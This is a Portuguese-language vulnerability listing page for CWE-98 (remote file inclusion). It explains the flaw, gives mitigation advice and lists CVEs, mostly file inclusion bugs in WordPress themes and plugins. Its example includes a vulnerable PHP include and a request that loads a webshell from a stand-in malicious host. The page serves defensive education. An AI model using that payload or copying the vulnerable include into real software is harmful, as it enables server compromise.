Falhas do tipo CWE-98

1.308 resultados

Inclusão Remota de Arquivo

A aplicação inclui um arquivo fornecido pelo usuário sem validação adequada, permitindo que um atacante carregue e execute código malicioso de um servidor remoto. O erro ocorre quando a entrada do usuário é passada diretamente a funções como `include()`, `require()` ou equivalentes, sem sanitização ou whitelist.

Exemplo

Uma página PHP que faz `include($_GET['page'] . '.php')` permite que um atacante acesse `?page=http://malicioso.com/shell`, carregando e executando um webshell hospedado externamente no contexto da aplicação alvo.

Como mitigar

Valide e restrinja o parâmetro a uma lista branca de arquivos permitidos; nunca permita URLs remotas em includes; use funções seguras como `basename()` para remover paths, e desabilite `allow_url_include` no PHP. Idealmente, evite lógica dinâmica de includes — use routing/controllers explícitos.

CVE-2025-68540HIGHWordPress Fana theme <= 1.1.35 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68563HIGHWordPress Subscribe to Unlock Lite plugin <= 1.3.0 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-88994MEDIUMAll Bootstrap Blocks 1.3.20 - 1.3.31 - Contributor+ LFI via lightspeed Block AttributesEPSS 0.4%CVE-2025-68066HIGHWordPress Soledad theme <= 8.7.0 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68067HIGHWordPress Stockholm Core plugin <= 2.4.6 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2022-50954MEDIUMWordPress Plugin cab-fare-calculator 1.0.3 Local File InclusionEPSS 0.4%CVE-2026-25326HIGHWordPress CMSMasters Content Composer plugin <= 1.4.5 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69087HIGHWordPress FreeAgent theme <= 2.1.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69086HIGHWordPress Issabella theme <= 1.1.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69083HIGHWordPress Frappé theme <= 1.8 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68841HIGHWordPress TopperPack – Complete Elementor Addons, theme & CPT Builder plugin <= 1.2.1 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69356HIGHWordPress TheGem Theme Elements (for Elementor) plugin <= 5.11.0 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69342HIGHWordPress Calafate theme <= 1.7.7 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68560HIGHWordPress TheGem Theme Elements (for Elementor) plugin <= 5.10.5.1 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-12194LOWPHPIPAM Authenticated LFIEPSS 0.4%CVE-2025-26137HIGHSystemic Risk Value <=2.8.0 is vulnerable to Local File Inclusion via /GetFile.aspx?ReportUrl=. An unauthenticated attacker can exploit thisEPSS 0.4%CVE-2016-20077MEDIUMWordPress Plugin Photocart Link 1.6 Local File Inclusion via decode.phpEPSS 0.4%CVE-2025-68065HIGHWordPress Hub Core plugin < 6.0.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-64284HIGHWordPress Majestic Support plugin <= 1.0.7 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68068HIGHWordPress Stockholm theme <= 9.14.1 - Local File Inclusion vulnerabilityEPSS 0.4%